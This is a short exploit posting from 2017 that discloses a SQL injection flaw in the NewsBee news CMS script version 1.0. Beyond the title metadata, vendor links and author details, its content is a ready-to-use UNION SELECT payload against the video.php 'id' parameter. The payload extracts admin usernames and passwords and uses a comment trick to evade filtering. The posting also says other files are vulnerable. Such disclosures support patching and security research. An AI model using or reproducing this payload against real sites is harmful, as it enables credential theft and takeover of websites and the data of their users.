Fully Featured News CMS 1.0 SQL Injection
Posted on 08 February 2017
# # # # # # Exploit Title: NewsBee - Fully Featured News CMS Script v1.0 - SQL Injection # Google Dork: N/A # Date: 07.02.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Buy: https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937 # Demo: http://demos.nelliwinne.net/NewsBee/ # Version: 1.0 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/video.php?id=[SQL] # -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6,7+from+admin-- - # Etc....Other files have vulnerabilities ... # # # # #